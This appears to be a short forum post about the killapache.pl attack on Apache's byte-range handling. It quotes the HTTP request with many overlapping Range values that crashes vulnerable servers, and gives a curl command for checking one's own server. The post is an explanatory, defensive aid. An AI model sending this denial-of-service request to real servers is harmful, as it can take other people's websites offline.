The
killapache.pl launches in a few threads the following simple request:
Quote:
GET / HTTP/1.1
Host: example.com
Range: bytes=0-,5-0,5-1,5-2,5-3,5-4,<...>,5-1299,5-1300
Accept-Encoding: gzip
Connection: close
|
And if there is no nginx installed your Apache server will be easily laid down.
Here is a simple command to check if your server is vulnerable:
Quote:
|
curl -I -H "Range: bytes=0-1,0-2" -s yourserver.com/robots.txt | grep Partial
|
If you received
206 Partial Content, you are in big trouble.